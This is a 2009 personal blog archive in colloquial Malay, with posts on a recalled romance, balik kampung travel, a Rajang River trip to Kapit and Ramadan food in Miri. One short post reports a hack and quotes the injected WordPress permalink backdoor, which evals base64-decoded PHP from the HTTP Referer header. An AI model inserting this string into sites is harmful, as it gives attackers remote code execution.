Archive for September, 2009

Lamunan pun terhenti.. ceh!

Saturday, September 26th, 2009

Posted eddyra by on Story

xx June1996
Flight MAS 737 pun mendarat di airport Sultan Mahmud Kuala Terengganu petang itu entah pukul berapa aku pun tak ingat.. Alhamdulillah aku selamat sampai ke Kuala Terengganu selepas setahun duk di Newcastle Upon Tyne, United Kingdom. Aku tak nak balik pun tapi Ma aku paksa jugak aku balik cuti summer tuh.

Penumpang-penumpang pun bangun untuk keluar dari flight, termasuk lah aku. Dalam duk sibuk-sibuk amik luggages aku tu, ada la barang seorang passanger ni terjatuh, nampak payah sangat terkapai-kapai tangan dia tu, jadi aku dengan selambanya tolong angkat kan dah serahkan pada dia. Cerita Hindustangg pun bermula.. he he he..

Namanya Sasha, berusia ketika itu 29 tahun.. 3 tahun tua dari aku gezzzz.. potong stim. Cantik la dengan make-up sana sini.. dan segalanya mantap tak payahlah describe banyak-banyak bukan cerita lucah macam korang baca kat blogspot tu pun. Free hair..

Di pendekkan cerita, kita orang ni pun bertukar nombor talipon.

Sasha bekerja di sebuah bank di bandar Kuala Terengganu sebagai pusher, opss cashier. So patutlah make-up sampai 2 inci.. Pertemuan di atur di bandar Kuala Terengganu, kedai cap ayam jer lagi pun dia yang belanja, aku mana ada duit Malaysia masa tu. Duit pound tak tukar lagi..

Lepas tu.. ehem.. lepas tu malas la nak cerita kan. Maka cerita ini berlanjutan lah sampai ke malam raya Aidilfiti 1996. Malam raya itu juga kami terpaksa melupakan segala-galanya. Orang tua yang tak merestui.. ceh alasan .. jantan kabaret sungguh.

Masa pun berlalu..
Setahun..
Dua tahun..
.
.
.
2009 pun tiba, hari raya ke empat 23th September 2009.. hehehe..

Tup-tup dia datang berhari-raya di rumah terbuka kawan kami, secara tidak dijangka.. masih single, tapi dah nampak tua dari dulu. Errr berisi sikit, banyak lemak cholestrol kut, nasib baik bukan jodoh aku…. tak banyak yang berubah lah, design masih sama. Ada depreciation la sikit.. :)

13 tahun berlalu aku masih cam muka dia walaupun dah lama, dia dah tak kenal aku hingga kawan aku perkenalkan semula aku pada dia. Dia terkejut beruk. Aku buat bodo jer, sebab wife aku ada tepi aku dengan anak-anak. Kawan aku dengan selamba cakap kat wife aku, “GF lama dia”.. gezzzzz..

Wife aku senyum jer kat aku, aku senyum juge he he he..

Kami tak bertegur sapa pun, sebab aku rasa malu.. aku rasa dia tak malu tapi dia segan dengan wife aku, aku rasalah kan.

Wife aku masuk dalam rumah tuan rumah, aku kebetulan ada dekat Sasha. Aku tegur “lama tak nampak” .. dia jawab entah apa aku tak ingat ..

Lepas tu aku blah bawak anak aku amik air minuman.. line tak clear bro kah kah kah..

Sasha dah nak blah, dia bersalaman dengan tuan rumah, dan dengan wife aku. Aku tengok jer ‘kawan lama’ aku itewww berlalu.

Gezzz..

Abis makan, kami pun blah, naik kereta menuju ke Kemaman. Dan aku terpaksa bercerita tentang ini kepada wife aku.. cerita yang tak kesampaian.. cewah..

Wife aku tersenyum sepanjang jalan.. he he he ..

Selamat Hari Raya Aidilfitri

Friday, September 18th, 2009

Posted eddyra by on Story

I hope that everyone will enjoy this festive season with all their beloved families and friends. I wish all of you a safe journey during the balik kampung season and do be careful on the road for those who are driving. Be sure to get a good rest before and during the journey to your destination.

My blog is not having cuti raya, so everyone may visit to my blog hehehe..

I would like to wish all my Muslim friends and readers a very Selamat Hari Raya Aidil Fitri, maaf zahir dan batin. To non-muslim happy holiday again and enjoy the festive season.

Yahoo! Balik raya..

Friday, September 18th, 2009

Posted eddyra by on Story

Akhirnya aku meninggalkan bandaraya Miri tepat jam 10.25am. Sepatutnya jam 10.05am tapi biasalah airasia now everyone can fly. Takde class langsung, apa nak buat dah company aku kasi aku airasia.

Aku start cuti 16/09/09 sampai 28/09/09 uiii lama tu 12 hari. Alang-alang amik cuti. Lain kali dah payah dah..

Geeezzz… Boss call, marah pasal job di St Joseph platform ada problem!! Email masuk dari client. Panas punya email… Aduiiii… Aku nak raya weiiii.. Nak raya ni… Nak tak nak kena la layan gak email tu. Ini lah operation engineer punya life. Call masuk dan email masuk.. Berserabut sekejap kepala ni..

Dalam flight, aku dapat hot seat tapi hampeh betul duduk tepi wing. Apa view aku nak tengok. Ada kamera besar kepala lori pun tak de gunanya. Bukan boleh snap gambo kat bawah pun.

Flight pun meninggalkan ruang angkasa Miri. Masa makan pun tiba, hehehe ada Melayu kabaret tak puasa. Eiiii tak malu sungguh.

Puasa aku kering lagi sebab flight attendance tu pakai skirt. Lain kali pakai la tudung labuh dan jubah. Eeiii..

Sampai LCCT pukul 12.25pm.. Delay jugak. Lalu tepi mcD ehh ada awek pakai tudung dengan selamba makan. Excuse la tu.. Hehe belasah saja bah.

Amik bus, bayar RM1.50 menuju ke KLIA.
Sampai KLIA, flight ke Kuantan jam 05.50pm mak aiiii lama nyer duk tercanguk kat KLIA.

Ok lah.. At least aku dah ready untuk balik raya. Esok baru nak cari baju raya, entah masih ada atau dah takde.

Kemaman.. Here I am.

Perjalanan Miri – Kapit – Part 3

Friday, September 11th, 2009

Posted eddyra by on Story

Andrew ni memang asal dari Kapit lah. Aku jumpa kebetulan aku lepak di depan xxxxxx. Andrew cadangkan aku pergi jauh lagi ke pendalaman, hingga ke hujung Sg Rajang untuk melihat dengan mata sendiri buaya-buaya yang muncul di permukaan air. Dia boleh arrange kan dengan. Kena baya la bro, kau ingat pree ke..

Aku bertanyakan tentang mitos Bujang Senang pada Andrew ni. Menurutnya kepercayaan terhadap mitos ini masih menebal di sebelah pendalaman sana. Seandainya pukat mereka terjerat anak buaya, mereka akan lepaskan sambil memohon maaf di atas ketidak sengajaan itu. Ini semua adalah untuk mengelakkan kejadian yang tidak diingini berlaku pada mereka dan keturunan mereka. Menarik juga tu…

Andrew invite aku ke rumahnya yang cuma di seberang Sg Rajang. Aku kata next time la kalau ada umur panjang.

Ok apa yang ada di Kapit ni..

Mana-mana tempat yang aku sampai di Sarawak ni, aku akan cari di mana tamu. Tamu ni pasar bang.. Pasar.

Aku suka tengok apa yang mereka jual di tamu. Sebab aku mencari yang original di situ. Ada buah-buahan, sayuran dan akar-akar kayu yang dia orang tanam sendiri, cara kampung.

Aku dah lama duk kat bandar, sayur, buah-buahan semuanya di tanam secara modern dah. Kalau buah-buahan tu tak sah kalau takde rasa ubat awet mayat. Gezzzz… Bussiness punya pasal nak kasi cepat masak. Sama la dengan ayam, mesti cucuk punya.

So di tamu inilah yang aku cari.

Aku suka tengok makcik pakcik tempatan yang duk menjual tu. Berbagai kaum ada dengan rupa paras yang berbeza mengikut keturunan kaum mereka. Aku suka dengar slange yang dia orang ni tuturkan, memang la aku sik paham bah tapi syok dengar hehehe..

Aku kak nuan – I love u
Nuan bajiek – kamu cantik
Udah makai ka bedau – sudah makan ke belum.
Kimi nuan – mau ka mana
Dah mandik ka bedau – dah mandi ke belum
Deik jaik amai – kau ni jahat la
Aku ngetil dik – aku cubit kau
Anang jejet dik – jgn degil.
Gamal nuan jaik amal – muka kau buruk
Belit amai – bodo betul.
Baka mayas – mcm monyet

Jalan-jalan lagi sekitar bandar Kapit sambil-sambil snap gambo sekitar bandar dan orang-orangnya.

Masa aku gi tu orang ramai turun town sebab hari enam. Hari enam tu hari Sabtu lah. Sini tak sebut nama hari bro, dia orang sebut pakai nombor jer.

Apa yang aku perhatikan di sini, masyarakat di sini putih-putih jer kulit mereka. Kiut kiut. Aku rasa kulit aku yang paling kelabu asap kat Bandar Kapit tu. Satu lagi, tubuh mereka rendah jer, kebanyakkannya giteww..

Di sini ada satu banggunan peninggalan sejarah. Xxxxxx ni dibina dalam tahun xxxx oleh xxxx. Boleh masuk tapi tak bleh amik gambar. Aku nak masuk tapi hari Sabtu tak bukak. So tengok dari luar jer lah…

Ok lah. Aku dah nak balik. So beli return tiket Kapit – Sibu. Ferry nak depart jam 3 lebih. Aku rasa nak pitam menaham panas, dah la bulan puasa cenggini.

Entah bila pulak aku akan sampai lagi ke sini. At least tertulis dalam sejarah bahawa aku telah menjejak kan kaki di Kapit, menyusuri Sg Rajang.. Cewah.

Kadang-kadang rasa macam tak percaya aku dari Semenanjung, drive kete dari Miri hingga ke Sibu.. kemudian naik boat selama 3 jam hingga sampai ke Kapit.

So on the back tu aku cukup keletihan.

Tiba di pengkalan ferry Sibu sekitar jam 5.45pm. Bergegas amik kereta yang aku park depan hotel. Nasib baik tak kena curi. Sibu pun boleh tahan ooo kes-kes macam ni.

Orait.. Drive kete slow-slow menuju ke town center. Cantik jugak bandar Sibu ni. Siap ada square lagik. Pergh kebetulan malam tu ada mini concert nak celebrate merdeka.

Landscape Bandar Sibu pun boleh tahan la, menarik jugak dengan patung-patunh menatang di square ni.

Tak jauh dari sini, ada Pagoda. Nak juga stop tengok tapi masa tak mengizinkan. View kat sini cantik, ada kapal, boat di tepi Sg Rajang.

Cadang nak ke Bukit Uud, boleh tengok view bandar Sibu dari jauh. Takpa lah lain kali. Aku nak lama-lama di sini pun dah rasa macam mati kutu dah. Bimbang juga gangster ramai kat sini.

Menu berbuka hari ini ialah nasi yang dibeli dari xxxxx.

Dah beli tu drive lagi sampailah dekat park ni, tepi Sg Rajang juga. Ramai juga orang. Aku cari pot yang baik dan berbuka puasa lah aku seorang diri. Hmmm… Aku sedang berbuka puasa, di belakang aku ada couple tengah duk geli-geli. Belasah la kau nak buka puasa ke atau nak buka apa-apa pun.

At least sejarah sekali lagi tercipta, aku buka puasa di tepi Sg Rajang.

So malam tu aku nak keluar juga dari Sibu.

Bersambung..

Perjalanan Miri – Kapit – Part 2

Friday, September 11th, 2009

Posted eddyra by on Story

Perjalanan diteruskan. Menyusuri Sg Rajang yang penuh dengan misteri dan mitosnya.

Permulaan perjalanan tu kita dapat lihat sepanjang tebing sungai sebelah kirinya dipenuhi dermaga dan jetty-jetty kapal-kapal balak, kapal-kapal korek pasir dan heavy lifting cranes. Sawmill pun banyak yang duk process kayu balak. Memang pun Sarawak ni kaya dengan tokey balak.

Sebelah kiri perjalanan tiada apa melainkan hutan. Sesekali terpandang rumah panjang. Hmm.. Ini yang aku nak cari sebenarnya. Walaupun tak original tapi locationnya kependalaman nampak unik giteww. Kalau boleh aku nak tengok rumah panjang yang original, tapi ini siap dengan parabola bro hehehe…

Express Kapit Boleh 268 terus menyusuri Sg Rajang. Laju la jugak. Ada aircond. Ada tayangan video. Kalau boring boleh keluar boat untuk tengok dengan lebih jelas permandangan sekitarnya. Tapi kalau jatuh aku bimbang kena ketik di bujang senang jer.

Sesekali boat yang aku naiki ni berselisih dengan kapal korek pasir. Aku tak tau ngapa dia korek pasir, samada nak dalamkan sungai atau nak jual pasir.

Semakin jauh ke pendalaman, melepasi bandar xxxxxx aku dapat tengok kiri kanan sungai ni dah semakin mengecil dari mula-mula perjalanan tadi. Kiri kanan sungai hanya hutan. Sesekali jumpa rumah panjang. Sesekali berselisihan dengan perahu kecil. Eiii… Tak takut ke tetiba bujang senang muncul kat air…. auu cakk dia tegur…

Bro… Korang yang duk kat KL tu best sangat ke bau asap lori asap taxi asap kilang gezzzz… Datang sini la bro, kita tengok keindahan alam semula jadi. Sini cool bro, takde jalan jam. Sungai punya la luas takde nye nak jam. Awek awek pun cantik-cantik bro. Putih mak aiiii… Gebu-gebu. Awek kat KL tu harap pakai fair n lovely jer ler nak kasi putih. Jangan marah yer… :p.

Best sangat ke tengok KLCC tu? Hek eleh.. Meh sini kita tengok rumah panjang, kita kenali mereka, budaya mereka, cara hidup mereka. Tak kira siapa mereka, mereka adalah masyarakat peribumi yang unik, bagi aku la kan.

Aku suka tengok life dia orang di sebelah Sabah dan Sarawak ni. Aku tak cari Melayu di sini, buang karan. Melayu ramai di Semenanjung, letih. Kita tengok kaum-kaum yang takda di sana. Kalau masa kita isi form, dekat RACE tu ada column OTHERS tu. Malay, Chineese, Indian or OTHERS. Haa… Kita kenali kaum OTHERS ni.

Kaum-kaum OTHERS ni termasuklah Iban, Dusun, Melanau, Kedayan, Orang Ulu (piwettttttt!), Bajau, Kelabit, Bidayuh dan banyak lagi lah. Kalau la korang nak cari bini la, aku boleh cadangkan korang meh datang Sabah and Sarawak ni. Nak berbini lebih pun datang la sini. Aku tak bleh dah, aku sign mati dengan bini aku dah. Ehemm.. Lain la kalau wife aku tak baca blog aku ni muahahahahhahaa…

Ok jauh dah aku mengarut. Kalau buat essay ni mesti dah kena potong markah.

Akhirnya sampailah aku di bandar Kapit. Aku mati mati ingat Kapit pekan kecil yang kuno dan masih traditional. Rupanya tak. Aku salah.

Keluar je dari boat tu, naik anak-anak tangga jetty menuju ke bandar Kapit. Aku di sapa oleh makcik makcik tempatan yanh jual air dan makanan di tangga. Makcik, aku puasa la makcik.

Dari atas jetty ni boleh nampak boat yang aku naiki tadi. Boleh nampak Sg Rajang di depan mata.

Adeh kering tekak. Minum air batu pun best ni, puasa ke tak orang ingat aku Dayak apa hahaha.. tak baik bro. Korang jangan ponteng puasa, lain la kalau korang jantan kabaret yang datang bulan hahaha…

Gezzzz… Sampai la aku di Kapit square. Ada orang jual juadah buka puasa seawal jam 12 tengahari. Hehehe… Rasa macam nak makan je. Lapar bro. Panas pulak tu matahari atas kapala.

Aku lepak dulu kat sini sambil mengeringkan pahala puasa. Aduhaiiiii putihnya, cantiknyaaaa…. Rilex la Ummi ya, awak lagi cantik. Hehehe

Hmmm.. Apa yang aku dapat perhatikan lah, masyarakat di sini kebanyakkanya dari kaum Iban. Aku tanya dengan Andrew, lelaki iban yang converted to muslim sebab mengahwini seorang wanita muslim ni.

Dia ngaku dia Islam la, tak kisahlah sambil bercakap dengan aku tu dia sambil merokok. Haha..

upload photo later..

Ramadhan di Miri

Wednesday, September 9th, 2009

Posted eddyra by on Story

Hari ni dah masuk hari ke 18 umat Islam berpuasa.

Ramadhan tahun ni aku sambut di Miri. Seorang diri tidak seperti tahun-tahun yang lalu. Biasa saja tiada apa-apa yang nak dibanggakan ler..

Set jam pukul 4.30am, goreng ayam. Panaskan nasi yang aku beli kat pasar malam masa nak berbuka tu. Kadang-kadang belasah nasi sejuk jer, malas la nak hangatkan nasi tu. Budu sikit. Kicap sikit. Makan. Kopi O kawww..

Settle.

Imsak awal di sini. Jam 5.00am dah masuk Subuh. Ngam-ngam la sembahyang Subuh. Lepas tu sambung tido, pukul 7.00am bangun mandi manda then masuk meeting di Shell opis. Pedihnya mata, rasa nak tido.

Yang tak puasa tu selamba je buat air dalam meeting room. Minum depan orang ramai… Gezzzz..

Alah, tak kisah pun. Tak tergoda.

Abis meeting, masuk opis. Kering puasa aku tengok yang putih-putih dan gebu-gebu tu. Nak buat camana kan dah design dia cam tu. Ramadhan ke tak Ramadhan ke, sama je pakaian dia orang. Kalau bulan-bulan biasa, cerah juga mata time ngantuk tu.


umai…

Waktu kerja dipendekkan. Pukul 4.00pm dah boleh blah. Tengahari takde lunch hour, cuma sapa-sapa yang lapor tu boleh balik makan kat rumah especially yang datang bulan hehe.. Jantan kabaret yang datang bulan pun ada jugak yang selamba beruk smoking kat luar.. Cap ayam betul.


miding..? midin? maiden? eje entah camana..

Kalau tengahari gi town, ramai jugak orang. Kedai-kedai non muslim cam biasa la sentiasa ada orang. Kalau aku makan kat situ pun rasanya orang tak amik hal pun. Apatah lagi muka aku dia orang kata cam kaum Dayak. Ada jugak aku tengok yang selamba bungkus makanan, alah kat Semenanjung pun berlambak.


ulat mulong.. makan dengan sagu.. best oooo…

Cumanya, aku tak rasa sangat aura Ramadhan tu di Miri ni. Macam di Terengganu aku boleh feel. Kedai makan tutup di siang hari. Muka sorang-sorang nampak letih jer, hmm.. Pendek kata dapat rasa aura Ramadhan bila kita dikelilingi majority yg berpuasa.


rebung.. aku agak-agak la .. hehehe

Orait..

Petang abis kerja, biasanya aku gi cari makanan untuk berbuka puasa di Bazaar Ramadhan di Sabarkas dekat roundabout atau satu lagi dekat dengan stadium tu. Banyak lah lauk pauk dan juadah untuk berbuka puasa.

Orait di Miri ni, aku suka tengok kuih muih dan makanan yang tidak pernah aku jumpa di Semenanjung. Makanan yang pelik-pelik la.


Errrr… sambal mangga..

Setakat apam balik, ikan bakar, bubuk lambuk Sarawak, nasi kerabu, goreng pisang tu biasa la kan, kat Semenanjung pun ada cuma rasa dan stylenya mungkin berbeza.

Di sini pun ada murtabak, tapi dia orang makan dengan kuah kari, kuah bawang tu takde. Aku dah tanya.


Aneka kek lapis Sarawak

Nasi kerabu pun aku dah cuba, hmm.. tak memenuhi citarasa. Mee goreng ka, nasi goreng ka.. laksa penang ka.. Lain rasa dari di Semenanjung. Bukan tak sedap, jangan amik hati bah, cuma bukan selera aku jer. Walaupun nasi kerabu tu tukang jual tu declare dia tu ore Klate hehe.. tatap rasanya tak sesedap di Terengganu.


Obor-obor… gezzzzz

Ok aku ada terjumpa beberapa spesis makanan yang aku tak pernah aku tengok di Semenanjung. Contohnya bubur pedas, hanya terdapat di sebelah sini. Aku tak pernah cuba. Mesti tak sedap, tak sedap untuk aku lah.

Haa.. Di sini ada lauk yang dihasilkan dari jellyfish, obor-obor tu. Eii.. Boleh makan rupanya.

Di sebelah Sarawak ni femes dengan umai. Dia orang cakap nyaman, tapi aku tak pernah cuba. Diperbuat dari ikan di campur dengan entah apa-apa kemudian diberi nama umai. Macam sambal giteww..


Sambal kat sini ada sambal mangga. Sambal jering. Lagi sambal apa entah.

Err.. Ada beberapa lauk yang aku tak pernah nampak sebelum ni, mungkin tidak di tanam di Semenanjung contohnya … Ish nak tulis pun tak tau apa nama hahahah…

Faberet aku time buka puasa ikan bakar, biasanya pari bakar, pari masak asam, sayur sikit, budu belacan, ulam sikit. Dah cukup. Tapi di sini, satu pun tak boleh harap. Memang siksa jiwaraga. Apa nak buat makan jer lah walau semua yang aku sebut tu ada di sini. Aku memang totally tak bleh terima masakan Sarawak, maaf sekali lagi, bukan tak sedap, cuma selera tidak pada aku.. nasib baik dulu aku tak berkahwin dengan orang Sarawak, kalau tak hari-hari ler telan umai obor-obor tu.. gezzz..

Baru-baru ni balik Kemaman dan sempat berbuka puasa dengan anak bini dan sekali tu aku balik rumah Ma aku di Kuala Terengganu…. perghh rasa macam betul-betul buka puasa cakap lu bro. Solid. Kena ikan singgam, masak lemak cili api tempoyak gezzzz.. Rasa tak nak balik ke Miri sampai abis raya. Hehe..


Ngecum..

Masa berbuka puasa tu agak menyayat hati juga lah. Kadang-kadang buat acara solo kat apartment, kadang-kadang sorang-sorang kat bangku taman permainan. 2-3 kali jugak buka puasa sambil tengok sunset di Luak Bay. Layan blues. Aku rasa boleh bilang dengan jari berbuka ramai-ramai. Apa nak buat.


Solo..

Malam lepas berbuka, ada masjid and surau buat tarawih di sekitar Miri ni. Aku gi sekali je kat masjid selebihnya aku menguzurkan diri. Buat simple tarawih je kat apartment. At least suasana malam Ramadhan masih hidup dengan kedengaran orang bertarawih di sini. Tak kisahlah belakang masjid tu ada pub atau pun lounge. Belasah saja..

Apa-apa pun itu lah pengalaman.

Nanti aku upload gambar.

My blog got hacked

Saturday, September 5th, 2009

Posted eddyra by on Blog

/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ …..

Gezzzz…..
My WordPress blog has been hacked! Malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into WordPress PHP files or in database..

The title link is not working..

Its OK, i will fix it later..

**update: Fixed.

 

Ads Links

About Me

    This is my blog about my thought and my opinion. I will address anything on random topics and anything that comes to my mind. I invite you to join my rubbish blog by reading my posts and please feel free to write down your comment. About me